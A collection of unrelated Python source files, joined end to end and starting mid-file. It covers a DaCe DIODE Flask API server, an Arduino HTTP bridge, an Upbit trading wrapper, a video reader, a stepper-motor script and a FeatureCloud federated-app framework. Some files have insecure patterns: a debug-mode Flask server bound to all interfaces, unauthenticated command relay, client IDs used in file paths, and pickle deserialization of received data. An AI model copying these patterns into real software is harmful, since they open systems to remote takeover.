{} ret['elements'] = retlist return jsonify(ret) else: print("Error: op " + str(op) + " not implemented") abort(400) @app.route('/dace/api/v1.0/run/status/', methods=['POST']) def get_run_status(): if not request.json or not 'client_id' in request.json: print("[Error] No client id provided, cannot continue") abort(400) es = es_ref[0] # getExecutionOutput returns a generator to output to a HTTP1.1 stream outputgen = es.getExecutionOutput(request.json['client_id']) return Response(outputgen(), mimetype='text/text') @app.route('/dace/api/v1.0/run/', methods=['POST']) def run(): """ This function is equivalent to the old DIODE "Run"-Button. POST-Parameters: (Same as for compile(), language defaults to 'dace') perfmodes: list including every queried mode corecounts: list of core counts (one run for every number of cores) """ try: perfmodes = request.json['perfmodes'] except: perfmodes = ["noperf"] try: corecounts = request.json['corecounts'] except: corecounts = [0] try: repetitions = request.json['repetitions'] except: repetitions = 1 # Obtain the reference es = es_ref[0] client_id = request.json['client_id'] es.addRun(client_id, "start", {}) for pmode in perfmodes: perfopts = {'mode': pmode, 'core_counts': corecounts, 'repetitions': repetitions} tmp = compileProgram(request, 'dace', perfopts) if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # ERROR print("An error occurred") abort(400) dace_state.repetitions = repetitions more_options = {} more_options['perfopts'] = perfopts runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state), more_options) es.addRun(client_id, "end", {}) # There is no state information with this, just the output # It might be necessary to add a special field that the client has to filter out # to provide additional state information return Response(runner(), mimetype="text/text") @app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST']) def optimize(): """ Returns a list of possible optimizations (transformations) and their properties. POST-Parameters: input_code: list. Contains all necessary input code files optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree. This optpath is applied to the provided code before evaluating possible pattern matches. client_id: For identification. May be unique across all runs, must be unique across clients :return: matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }. Contains the matching transformations. `affects` is a list of affected node ids, which must be unique in the current program. """ tmp = compileProgram(request, 'dace') if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # Error return jsonify({'error': tmp}) opt_per_sdfg = get_transformations(sdfgs) return jsonify(opt_per_sdfg) @app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST']) def compile(language): """ POST-Parameters: sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value. Can be a list of SDFGs. NOTE: If specified, `code`, `sdfg_prop`, and `language` (in URL) are ignored. code: string/list. Contains all necessary input code files [opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree. This optpath is applied to the provided code before compilation [opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties. The step element of the dicts is optional. If it is provided, it specifies the number of optpath elements that preceed it. E.g. a step value of 0 means that the property is applied before the first optimization. If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG [opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set provided in the DaCe settings. If null (or omitted), no instrumentation is enabled. client_id: <string>: For later identification. May be unique across all runs, must be unique across clients Returns: sdfg: object. Contains a serialization of the resulting SDFGs. generated_code: string. Contains the output code sdfg_props: object. Contains a dict of all properties for every existing node of the sdfgs returned in the sdfg field """ tmp = None try: tmp = compileProgram(request, language) if len(tmp) > 1: sdfgs, code_tuples, dace_state = tmp else: # Error return jsonify({'error': tmp}) opts = get_transformations(sdfgs) compounds = {} for n, s in sdfgs.items(): compounds[n] = { "sdfg": s.to_json(), "matching_opts": opts[n]['matching_opts'], "generated_code": [*map(lambda x: getattr(x, 'code', str(x)), code_tuples[n])] } return jsonify({"compounds": compounds}) except Exception as e: return jsonify({'error': str(e), 'traceback': traceback.format_exc()}) @app.route('/dace/api/v1.0/diode/themes', methods=['GET']) def get_available_ace_editor_themes(): import glob, os.path path = "./webclient/external_lib/ace/" files = [f for f in glob.glob(path + "theme-*.js")] filenames = map(os.path.basename, files) return jsonify([*filenames]) def get_settings(client_id, name="", cv=None, config_path=""): from dace.config import Config if cv is None: clientpath = "./client_configs/" + client_id + ".conf" if os.path.isfile(clientpath): Config.load(clientpath) else: Config.load() if cv is None: cv = Config.get() ret = {} for i, (cname, cval) in enumerate(sorted(cv.items())): cpath = tuple(list(config_path) + [cname]) try: meta = Config.get_metadata(*cpath) # A dict contains more elements if meta['type'] == 'dict': ret[cname] = {"value": get_settings(client_id, cname, cval, cpath), "meta": meta} continue # Other values can be included directly ret[cname] = {"value": cval, "meta": meta} except KeyError: print('WARNING: No metadata for configuration key', cpath) return ret def set_settings(settings_array, client_id): from dace.config import Config if not os.path.isdir("./client_configs"): os.mkdir("./client_configs/") clientpath = "./client_configs/" + client_id + ".conf" if os.path.isfile(clientpath): Config.load(clientpath) else: Config.load() for path, val in settings_array.items(): path = path.split("/") Config.set(*path, value=val) Config.save(clientpath) return Config.get() @app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST']) def diode_settings(operation): if operation == "get": client_id = request.json['client_id'] return jsonify(get_settings(client_id)) elif operation == "set": print("request.data: " + str(request.data)) settings = request.json client_id = settings['client_id'] del settings['client_id'] return jsonify(set_settings(settings, client_id)) else: return jsonify({"error": "Unsupported operation"}) @app.route('/dace/api/v1.0/status', methods=['POST']) def status(): # just a kind of ping/pong to see if the server is running return "OK" def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument("-l", "--localhost", action="store_true", help="Bind to localhost only") parser.add_argument("-r", "--remotedace", action="store_true", help="Use ssh commands instead of locally running dace") parser.add_argument("-rd", "--restoredace", action="store_true", help="Restore the backup file") parser.add_argument("-e", "--executor", action="store_true", help="Run as an executor server instead of DIODE server") parser.add_argument("-p", "--port", type=int, help="Port to listen on") args = parser.parse_args() if args.restoredace: from dace.config import Config Config.load("./dace.conf.bak") Config.save() remote_execution = args.remotedace es = ExecutorServer() es_ref.append(es) if not args.executor: app.run(host='localhost' if args.localhost else "0.0.0.0", debug=True, port=args.port, use_reloader=False) es.stop() else: import atexit def tmp(): es.stop() atexit.register(tmp) # Wait for an event that will never arrive (passive wait) event = threading.Event() event.wait() if __name__ == '__main__': main()
ServerComm.py
#!/usr/bin/python import urllib2 import urlparse import urllib import json import threading import time import socket import sys from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler from datetime import datetime import sys sys.path.insert(0, '/usr/lib/python2.7/bridge/') from bridgeclient import BridgeClient as bridgeclient NUMIO = 20 SERVER_IP = None SERVER_PORT = None ATmega_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ATmega_socket.connect(('localhost', 6571)) io_state = {} for io in range(NUMIO): io_state[str(io)] = None def keep_alive(): while True: keepalive_endpoint = "http://" + SERVER_IP + ":" + str(SERVER_PORT) + "/keep-alive" try: get = urllib2.Request(keepalive_endpoint) resp = urllib2.urlopen(get, timeout=5) # print resp.read() time.sleep(5) except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() def push_update(): db_endpoint = "http://" + SERVER_IP + ":" + str(SERVER_PORT) + "/arduino-to-db" value = bridgeclient() global io_state while True: post = False for io in io_state: new_val = value.get(io) old_val = io_state.get(io) if new_val != old_val: io_state.update({io: new_val}) post = True time.sleep(0.05) if post: print str(datetime.now()), "POSTING TO ENDPOINT ", db_endpoint, print io_state try: io_state_json = json.dumps(io_state) post = urllib2.Request(db_endpoint, io_state_json, {'Content-Type': 'application/json'}) resp = urllib2.urlopen(post, timeout=5) # print resp.read() except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() class RestHTTPRequestHandler(BaseHTTPRequestHandler): @staticmethod def parse_query(path): parsed_path = urlparse.urlparse(path) queries = parsed_path.query.split("&") query_dict = {} for q in queries: key, value = q.split("=") query_dict[key] = value return query_dict def do_GET(self): global SERVER_IP global SERVER_PORT if SERVER_IP is not None or SERVER_PORT is not None: try: cmd = urllib.unquote(self.path.split("/")[1]) + "\n" ATmega_socket.send(cmd) self.send_response(200) self.end_headers() except urllib2.HTTPError, e: print str(datetime.now()), 'HTTPError = ' + str(e.code) except urllib2.URLError, e: print str(datetime.now()), 'URLError = ' + str(e.reason) except (KeyboardInterrupt, SystemExit): print str(datetime.now()), "KeyboardInterrupt" sys.exit() except Exception: import traceback print str(datetime.now()), 'generic exception: ' + traceback.format_exc() else: try: queries = self.parse_query(self.path) print str(datetime.now()), "Received Server IP and Port: ", queries SERVER_IP = queries["ip_address"] SERVER_PORT = queries["port"] t1 = threading.Thread(target=push_update) t2 = threading.Thread(target=keep_alive) t1.start() t2.start() self.send_response(200) self.end_headers() except (KeyboardInterrupt, SystemExit): self.send_response(417) self.end_headers() sys.exit() return # def do_POST(self): # new_id = max(filter(lambda x: x['id'], TODOS))['id'] + 1 # form = cgi.FieldStorage(fp=self.rfile, # headers=self.headers, environ={ # 'REQUEST_METHOD':'POST', # 'CONTENT_TYPE':self.headers['Content-Type'] # }) # new_title = form['title'].value # new_todo = {'id': new_id, 'title': new_title} # TODOS.append(new_todo) # self.send_response(201) # self.end_headers() # self.wfile.write(json.dumps(new_todo)) # return httpd = HTTPServer(('0.0.0.0', 9898), RestHTTPRequestHandler) while True: httpd.handle_request()
model.py
# -*- coding: utf-8 -*- """ Created on Wed Apr 14 03:44:03 2021 @author: kmwh0 """ ''' send price data to price_queue method: run_tracking() while True: if not self.price_queue.empty(): data = price_queue.get() //receive json data print(data) ''' from multiprocessing import Process import multiprocessing as mp import threading import datetime import time from . import upbit as upbit import asyncio import os uuid_list = [] process = None price_queue = None def producer(q,t): #멀티프로세서 proc = mp.current_process() print("Process Name: ", proc.name) print(" __name__ : ",__name__) print("Thread Name: ", threading.currentThread().getName()) try: asyncio.run(upbit.upbit_websocket(q,t)) except: print("소켓문제: 멀티프로세서 재구동") time.sleep(10) producer(q,t) ''' run to get coin price params: ticker list ''' def run_tracking(tickers,queue=None): global process,price_queue if process == None: #producer process price_queue = queue process = Process(name="droducer", target=producer, args=(queue,tickers), daemon=True) process.start() else: process.terminate() process = None #producer process process = Process(name="droducer", target=producer, args=(price_queue,tickers), daemon=True) process.start() ''' get coin name list params: ticker list ''' def get_timing_level(): return upbit.get_timing_level() def set_timing_level(level): return upbit.set_timing_level(level) def setKey(access,secret): return upbit.setKey(access,secret) def get_coinlist(): return upbit.get_upbit_coinlist() def get_orderlist(): return upbit.get_orderlist() def order(name,price,count): return upbit.order(name,price,count) def get_purchased(uuid): return upbit.check_purchased(uuid) #return dataframe def get_analyze(coinlist): return upbit.get_analyze(coinlist) #return dataframe def get_analyze_scalping(coinlist): return upbit.get_analyze_scalping(coinlist) def get_target(coinname:str, interval:str , k, count): return upbit.get_target(coinname,interval,k,count) def get_average(coinlist,interval,count): return upbit.get_average(coinlist,interval,count) def get_realtiming(): return upbit.real_timing def get_timingname(): return upbit.timing def get_start_time(interval): return upbit.get_start_time(interval) def buy_crypto(name,price=None,volume=None): return upbit.buy_crypto(name,price,volume) def sell_crypto(name): return upbit.sell_crypto(name) def get_market_price(name,unit="1"): return upbit.get_market_price(name,unit) if __name__ == '__main__': run_tracking([["KRW-XRP"]]) print("나는 부모") time.sleep(5) os.system("pause")
video_reader.py
import numpy as np import cv2 import threading import time class VideoReader(): def __init__(self, video_path): self.video_path = video_path self.vid_cap = cv2.VideoCapture(self.video_path) self.frame_time = (1/self.vid_cap.get(cv2.CAP_PROP_FPS)) * 1000 # in ms self.cur_frame = np.zeros((416,416,3), np.uint8) self.frame_num = 0 self.is_started = False self.frame_lock = threading.Lock() self.read_thread = threading.Thread(target=self.read_thread_func) self.read_thread.daemon = True self.read_thread.start() def reset(self): self.vid_cap = cv2.VideoCapture(self.video_path) self.cur_frame = np.zeros((416,416,3), np.uint8) self.read_thread = threading.Thread(target=self.read_thread_func) self.read_thread.daemon = True self.read_thread.start() def read_thread_func(self): while True: if self.is_started: ret, frame = self.vid_cap.read() self.frame_lock.acquire() if ret: self.cur_frame = frame.copy() # Video has finished being read else: self.cur_frame = None self.frame_lock.release() # End thread if frame is None: break time.sleep(self.frame_time/1000) #cv2.imshow("hmm", frame) #cv2.waitKey(int(self.frame_time)) def read(self): if self.frame_num >= 1: # Needed because the very first detection frame takes its own sweet time self.is_started = True frame = None self.frame_lock.acquire() if self.cur_frame is not None: frame = self.cur_frame.copy() self.frame_lock.release() self.frame_num += 1 return None, self.cur_frame
scovolini.py
#!/usr/bin/python import sys import os import argparse import time import json import signal import traceback import threading from stepper import Stepper import ui # ----- global variables ------ VERSION_MAJOR = 1 VERSION_MINOR = 0 VERSION_PATCH = 0 CONFIG_FILE = "config.json" DEFAULT_SPEED = 70 save_configuration = False steps_per_cycle = 0 speed = 0 debug_mode = False # ---------- functions ------------- def parse_input(): parser = argparse.ArgumentParser() parser.add_argument('cicli', type=int, help="Numero di cicli da effettuare") parser.add_argument('--vel', type=int, default=0, help="Velocita' dello scovolino (opzionale)") parser.add_argument('--taratura', action='store_true', help="Avvia la procedura per impostare di quanto avanza lo scovolino ad ogni ciclo (opzionale)") parser.add_argument('--debug', action='store_true', help="Lancia il programma in modalita' debug") return parser.parse_args() def taratura(): os.system("clear") print("-------------------------------") print("| Avvio procedura di taratura |") print("-------------------------------\n\n") raw_input("Portare lo scovolino in posizione di massima estensione e premere [INVIO].\n") print("Ora lo scovolino tornera' indietro, premere [INVIO] quando si e' soddisfatti della posizione raggiunta.\n") raw_input("Premere [INVIO] per iniziare.") print("Inizio taratura...") time.sleep(2) d = {'key_pressed': False} def wait_enter(): raw_input() d['key_pressed'] = True steps_per_cycle = 0 with Stepper() as stepper: threading.Thread(target=wait_enter).start() while not d['key_pressed']: stepper.stepBackwards() steps_per_cycle += 1 time.sleep(0.1) stepper.stepForward(steps_per_cycle) # go back to initial position print("Taratura completata!\n") time.sleep(2) os.system("clear") return steps_per_cycle def load_params(args): vel = args.vel steps = 0 if not args.taratura: try: with open(CONFIG_FILE) as config_file: config = json.load(config_file) steps = config['steps_per_cycle'] if vel == 0: vel = config['speed'] except IOError: if debug_mode: traceback.print_exc("") print("Attenzione! File di configurazione non trovato!") print("Ripetere la taratura.") exit() else: steps = taratura() if vel == 0: print("Velocita' di default: " + str(DEFAULT_SPEED)) vel = DEFAULT_SPEED return vel, steps def exit_program(): os.system("clear") if save_configuration: try: if os.path.isfile(CONFIG_FILE): os.remove(CONFIG_FILE) with open(CONFIG_FILE, 'w') as config_file: json.dump({'speed': speed, 'steps_per_cycle': steps_per_cycle}, config_file) except IOError: if debug_mode: traceback.print_exc() raw_input("") print("Impossibile salvare la configurazione corrente!") time.sleep(3) os.system("clear") print("FINE!") time.sleep(3) os.system("clear") sys.exit(0) # ------------------ PROGRAM -------------------------------------- def main(): signal.signal(signal.SIGINT, exit_program) try: args = parse_input() debug_mode = args.debug ui.splash_screen() speed, steps_per_cycle = load_params(args) save_configuration = True with Stepper() as stepper: stepper.setSpeed(speed) for i in range(args.cicli): os.system("clear") print("Velocita': " + str(speed)) print("Cicli: " + str(i+1) + "/" + str(args.cicli)) print("\nPremere CTRL+C per bloccare") stepper.stepBackwards(steps_per_cycle) stepper.stepForward(steps_per_cycle) except Exception: if debug_mode: traceback.print_exc() raw_input("") os.system("clear") print("Si e' verificato un errore imprevisto!") time.sleep(3) exit_program() if __name__ == "__main__": main()
app.py
import abc import datetime import json import numpy as np import pickle import sys import threading import traceback from enum import Enum from time import sleep from typing import Dict, List, Tuple, Union, TypedDict, Literal DATA_POLL_INTERVAL = 0.1 # Interval (seconds) to check for new data pieces, adapt if necessary TERMINAL_WAIT = 10 # Time (seconds) to wait before final shutdown, to allow the controller to pick up the newest # progress etc. TRANSITION_WAIT = 1 # Time (seconds) to wait between state transitions class Role(Enum): PARTICIPANT = (True, False) COORDINATOR = (False, True) BOTH = (True, True) class State(Enum): RUNNING = 'running' ERROR = 'error' ACTION = 'action_required' class SMPCOperation(Enum): ADD = 'add' MULTIPLY = 'multiply' class SMPCSerialization(Enum): JSON = 'json' class LogLevel(Enum): DEBUG = 'info' ERROR = 'error' FATAL = 'fatal' class SMPCType(TypedDict): operation: Literal['add', 'multiply'] serialization: Literal['json'] shards: int exponent: int class App: """ Implementing the workflow for the FeatureCloud platform. Attributes ---------- id: str coordinator: bool clients: list status_available: bool status_finished: bool status_message: str status_progress: float status_state: str status_destination: str status_smpc: dict default_smpc: dict data_incoming: list data_outgoing: list thread: threading.Thread states: Dict[str, AppState] transitions: Dict[str, Tuple[AppState, AppState, bool, bool]] transition_log: List[Tuple[datetime.datetime, str]] internal: dict current_state: str Methods ------- handle_setup(client_id, coordinator, clients) handle_incoming(data) handle_outgoing() guarded_run() run() register() _register_state(name, state, participant, coordinator, **kwargs) register_transition(name, source, participant, coordinator) transition() log() """ def __init__(self): self.id = None self.coordinator = None self.clients = None self.thread: Union[threading.Thread, None] = None self.status_available: bool = False self.status_finished: bool = False self.status_message: Union[str, None] = None self.status_progress: Union[float, None] = None self.status_state: Union[str, None] = None self.status_destination: Union[str, None] = None self.status_smpc: Union[SMPCType, None] = None self.data_incoming = [] self.data_outgoing = [] self.default_smpc: SMPCType = {'operation': 'add', 'serialization': 'json', 'shards': 0, 'exponent': 8} self.current_state: Union[AppState, None] = None self.states: Dict[str, AppState] = {} self.transitions: Dict[ str, Tuple[AppState, AppState, bool, bool]] = {} # name => (source, target, participant, coordinator) self.transition_log: List[Tuple[datetime.datetime, str]] = [] self.internal = {} # Add terminal state @app_state('terminal', Role.BOTH, self) class TerminalState(AppState): def register(self): pass def run(self) -> str: pass def handle_setup(self, client_id, coordinator, clients): """ It will be called on startup and contains information about the execution context of this instance. And registers all of the states. Parameters ---------- client_id: str coordinator: bool clients: list """ self.id = client_id self.coordinator = coordinator self.clients = clients self.log(f'id: {self.id}') self.log(f'coordinator: {self.coordinator}') self.log(f'clients: {self.clients}') self.current_state = self.states.get('initial') if not self.current_state: self.log('initial state not found', level=LogLevel.FATAL) self.thread = threading.Thread(target=self.guarded_run) self.thread.start() def guarded_run(self): """ run the workflow while trying to catch possible exceptions """ try: self.run() except Exception as e: # catch all # noqa self.log(traceback.format_exc()) self.status_message = e.__class__.__name__ self.status_state = State.ERROR.value self.status_finished = True def run(self): """ Runs the workflow, logs the current state, executes it, and handles the transition to the next desired state. Once the app transits to the terminal state, the workflow will be terminated. """ while True: self.log(f'state: {self.current_state.name}') transition = self.current_state.run() self.log(f'transition: {transition}') self.transition(f'{self.current_state.name}_{transition}') if self.current_state.name == 'terminal': self.status_progress = 1.0 self.log(f'done') sleep(TERMINAL_WAIT) self.status_finished = True return sleep(TRANSITION_WAIT) def register(self): """ Registers all of the states transitions it should be called once all of the states are registered. """ for s in self.states: state = self.states[s] state.register() def handle_incoming(self, data, client): """ When new data arrives, it appends it to the `data_incoming` attribute to be accessible for app states. Parameters ---------- data: list encoded data client: str Id of the client that Sent the data """ self.data_incoming.append((data, client)) def handle_outgoing(self): """ When it is requested to send some data to other client/s it will be called to deliver the data to the FeatureCloud Controller. """ if len(self.data_outgoing) == 0: return None data = self.data_outgoing[0] self.data_outgoing = self.data_outgoing[1:] if len(self.data_outgoing) == 0: self.status_available = False self.status_destination = None self.status_smpc = None else: self.status_available = True self.status_smpc = self.default_smpc if self.data_outgoing[0][1] else None self.status_destination = self.data_outgoing[0][2] return data[0] def _register_state(self, name, state, participant, coordinator, **kwargs): """ Instantiates a state, provides app-level information and adds it as part of the app workflow. Parameters ---------- name: str state: AppState participant: bool coordinator: bool """ if self.transitions.get(name): self.log(f'state {name} already exists', level=LogLevel.FATAL) si = state(**kwargs) si._app = self si.name = name si.participant = participant si.coordinator = coordinator self.states[si.name] = si def register_transition(self, name: str, source: str, target: str, participant=True, coordinator=True): """ Receives transition registration parameters, check the validity of its logic, and consider it as one possible transitions in the workflow. There will be exceptions if apps try to register a transition with contradicting roles. Parameters ---------- name: str Name of the transition source: str Name of the source state target: str Name of the target state participant: bool Indicates whether the transition is allowed for participant role coordinator: bool Indicates whether the transition is allowed for the coordinator role """ if not participant and not coordinator: self.log('either participant or coordinator must be True', level=LogLevel.FATAL) if self.transitions.get(name): self.log(f'transition {name} already exists', level=LogLevel.FATAL) source_state = self.states.get(source) if not source_state: self.log(f'source state {source} not found', level=LogLevel.FATAL) if participant and not source_state.participant: self.log(f'source state {source} not accessible for participants', level=LogLevel.FATAL) if coordinator and not source_state.coordinator: self.log(f'source state {source} not accessible for the coordinator', level=LogLevel.FATAL) target_state = self.states.get(target) if not target_state: self.log(f'target state {target} not found', level=LogLevel.FATAL) if participant and not target_state.participant: self.log(f'target state {target} not accessible for participants', level=LogLevel.FATAL) if coordinator and not target_state.coordinator: self.log(f'target state {target} not accessible for the coordinator', level=LogLevel.FATAL) self.transitions[name] = (source_state, target_state, participant, coordinator) def transition(self, name): """ Transits the app workflow to the unique next state based on current states, the role of the FeatureCloud client, and requirements of registered transitions for the current state. Parameters ---------- name: str Name of the transition(which includes name of current and the next state). """ transition = self.transitions.get(name) if not transition: self.log(f'transition {name} not found', level=LogLevel.FATAL) if transition[0] != self.current_state: self.log(f'current state unequal to source state', level=LogLevel.FATAL) if not transition[2] and not self.coordinator: self.log(f'cannot perform transition {name} as participant', level=LogLevel.FATAL) if not transition[3] and self.coordinator: self.log(f'cannot perform transition {name} as coordinator', level=LogLevel.FATAL) self.transition_log.append((datetime.datetime.now(), name)) self.current_state = transition[1] def log(self, msg, level: LogLevel = LogLevel.DEBUG): """ Prints a log message or raises an exception according to the log level. Parameters ---------- msg : str message to be displayed level : LogLevel, default=LogLevel.DEBUG determines the channel (stdout, stderr) or whether to trigger an exception """ msg = f'[Time: {datetime.datetime.now().strftime("%d.%m.%y %H:%M:%S")}] [Level: {level.value}] {msg}' if level == LogLevel.FATAL: raise RuntimeError(msg) if level == LogLevel.ERROR: print(msg, flush=True, file=sys.stderr) else: print(msg, flush=True) class AppState(abc.ABC): """ Defining custom states Attributes: ----------- app: App name: str participant: bool coordinator: bool Methods: -------- register() run() register_transition(target, role, name) aggregate_data(operation, use_smpc) gather_data(is_json) await_data(n, unwrap, is_json) send_data_to_participant(data, destination) configure_smpc(exponent, shards, operation, serialization) send_data_to_coordinator(data, send_to_self, use_smpc) broadcast_data(data, send_to_self) update(message, progress, state) """ def __init__(self): self._app = None self.name = None self.participant = None self.coordinator = None @abc.abstractmethod def register(self): """ This is an abstract method that should be implemented by developers it calls AppState.register_transition to register transitions for state. it will be called in App.register method so that, once all states are defined, in a verifiable way, all app transitions can be registered. """ @abc.abstractmethod def run(self) -> str: """ It is an abstract method that should be implemented by developers, to execute all local or global operation and calculations of the state. It will be called in App.run() method so that the state perform its operations. """ @property def is_coordinator(self): return self._app.coordinator @property def clients(self): return self._app.clients @property def id(self): return self._app.id def register_transition(self, target: str, role: Role = Role.BOTH, name: str or None = None): """ Registers a transition in the state machine. Parameters ---------- target : str name of the target state role : Role, default=Role.BOTH role for which this transition is valid name : str or None, default=None name of the transition """ if not name: name = target participant, coordinator = role.value self._app.register_transition(f'{self.name}_{name}', self.name, target, participant, coordinator) def aggregate_data(self, operation: SMPCOperation, use_smpc=False): """ Waits for all participants (including the coordinator instance) to send data and returns the aggregated value. Parameters ---------- operation : SMPCOperation specifies the aggregation type use_smpc : bool, default=False if True, the data to be aggregated is expected to stem from an SMPC aggregation Returns ---------- aggregated value """ if use_smpc: return self.await_data(1, unwrap=True, is_json=True) # Data is aggregated already else: data = self.gather_data(is_json=False) return _aggregate(data, operation) # Data needs to be aggregated according to operation def gather_data(self, is_json=False): """ Waits for all participants (including the coordinator instance) to send data and returns a list containing the received data pieces. Only valid for the coordinator instance. Parameters ---------- is_json : bool, default=False if True, expects a JSON serialized values and deserializes it accordingly Returns ---------- list of n data pieces, where n is the number of participants """ if not self._app.coordinator: self._app.log('must be coordinator to use gather_data', level=LogLevel.FATAL) return self.await_data(len(self._app.clients), unwrap=False, is_json=is_json) def await_data(self, n: int = 1, unwrap=True, is_json=False): """ Waits for n data pieces and returns them. Parameters ---------- n : int, default=1 number of data pieces to wait for unwrap : bool, default=True if True, will return the first element of the collected data (only useful if n = 1) is_json : bool, default=False if True, expects JSON serialized values and deserializes it accordingly Returns ---------- list of data pieces (if n > 1 or unwrap = False) or a single data piece (if n = 1 and unwrap = True) """ while True: if len(self._app.data_incoming) >= n: data = self._app.data_incoming[:n] self._app.data_incoming = self._app.data_incoming[n:] if n == 1 and unwrap: return _deserialize_incoming(data[0][0], is_json=is_json) else: return [_deserialize_incoming(d[0]) for d in data] sleep(DATA_POLL_INTERVAL) def send_data_to_participant(self, data, destination): """ Sends data to a particular participant identified by its ID. Parameters ---------- data : object data to be sent destination : str destination client ID """ data = _serialize_outgoing(data, is_json=False) if destination == self._app.id: self._app.data_incoming.append((data, self._app.id)) else: self._app.data_outgoing.append((data, False, destination)) self._app.status_destination = destination self._app.status_smpc = None self._app.status_available = True def send_data_to_coordinator(self, data, send_to_self=True, use_smpc=False): """ Sends data to the coordinator instance. Parameters ---------- data : object data to be sent send_to_self : bool, default=True if True, the data will also be sent internally to this instance (only applies to the coordinator instance) use_smpc : bool, default=False if True, the data will be sent as part of an SMPC aggregation step """ data = _serialize_outgoing(data, is_json=use_smpc) if self._app.coordinator and not use_smpc: if send_to_self: self._app.data_incoming.append((data, self._app.id)) else: self._app.data_outgoing.append((data, use_smpc, None)) self._app.status_destination = None self._app.status_smpc = self._app.default_smpc if use_smpc else None self._app.status_available = True def broadcast_data(self, data, send_to_self=True): """ Broadcasts data to all participants (only valid for the coordinator instance). Parameters ---------- data : object data to be sent send_to_self : bool if True, the data will also be sent internally to this coordinator instance """ data = _serialize_outgoing(data, is_json=False) if not self._app.coordinator: self._app.log('only the coordinator can broadcast data', level=LogLevel.FATAL) self._app.data_outgoing.append((data, False, None)) self._app.status_destination = None self._app.status_smpc = None self._app.status_available = True if send_to_self: self._app.data_incoming.append((data, self._app.id)) def configure_smpc(self, exponent: int = 8, shards: int = 0, operation: SMPCOperation = SMPCOperation.ADD, serialization: SMPCSerialization = SMPCSerialization.JSON): """ Configures successive usage of SMPC aggregation performed in the FeatureCloud controller. Parameters ---------- exponent : int, default=8 exponent to be used for converting floating point numbers to fixed-point numbers shards : int, default=0 number of secrets to be created, if 0, the total number of participants will be used operation : SMPCOperation, default=SMPCOperation.ADD operation to perform for aggregation serialization : SMPCSerialization, default=SMPCSerialization.JSON serialization to be used for the data """ self._app.default_smpc['exponent'] = exponent self._app.default_smpc['shards'] = shards self._app.default_smpc['operation'] = operation.value self._app.default_smpc['serialization'] = serialization.value def update(self, message: Union[str, None] = None, progress: Union[float, None] = None, state: Union[State, None] = None): """ Updates information about the execution. Parameters ---------- message : str message briefly summarizing what is happening currently progress : float number between 0 and 1, indicating the overall progress state : State or None overall state (running, error or action_required) """ if message and len(message) > 40: self._app.log('message is too long (max: 40)', level=LogLevel.FATAL) if progress is not None and (progress < 0 or progress > 1): self._app.log('progress must be between 0 and 1', level=LogLevel.FATAL) if state is not None and state != State.RUNNING and state != State.ERROR and state != State.ACTION: self._app.log('invalid state', level=LogLevel.FATAL) self._app.status_message = message self._app.status_progress = progress self._app.status_state = state.value if state else None def store(self, key: str, value): """ Store allows to share data across different AppState instances. Parameters ---------- key: str value: """ self._app.internal[key] = value def load(self, key: str): """ Load allows to access data shared across different AppState instances. Parameters ---------- key: str Returns ------- value: Value stored previously using store """ return self._app.internal.get(key) def log(self, msg, level: LogLevel = LogLevel.DEBUG): """ Prints a log message or raises an exception according to the log level. Parameters ---------- msg : str message to be displayed level : LogLevel, default=LogLevel.DEBUG determines the channel (stdout, stderr) or whether to trigger an exception """ self._app.log(f'[State: {self.name}] {msg}') def app_state(name: str, role: Role = Role.BOTH, app_instance: Union[App, None] = None, **kwargs): if app_instance is None: app_instance = app participant, coordinator = role.value if not participant and not coordinator: app_instance.log('either participant or coordinator must be True', level=LogLevel.FATAL) def func(state_class): app_instance._register_state(name, state_class, participant, coordinator, **kwargs) return state_class return func def _serialize_outgoing(data, is_json=False): """ Transforms a Python data object into a byte serialization. Parameters ---------- data : object data to serialize is_json : bool, default=False indicates whether JSON serialization is required Returns ---------- serialized data as bytes """ if not is_json: return pickle.dumps(data) return json.dumps(data) def _deserialize_incoming(data: bytes, is_json=False): """ Transforms serialized data bytes into a Python object. Parameters ---------- data : bytes data to deserialize is_json : bool, default=False indicates whether JSON deserialization should be used Returns ---------- deserialized data """ if not is_json: return pickle.loads(data) return json.loads(data) def _aggregate(data, operation: SMPCOperation): """ Aggregates a list of received values. Parameters ---------- data : array_like list of data pieces operation : SMPCOperation operation to use for aggregation (add or multiply) Returns ---------- aggregated value """ data_np = [np.array(d) for d in data] aggregate = data_np[0] if operation == SMPCOperation.ADD: for d in data_np[1:]: aggregate = aggregate + d if operation == SMPCOperation.MULTIPLY: for d in data_np[1:]: aggregate = aggregate * d return aggregate app = App()
send_request_test.py
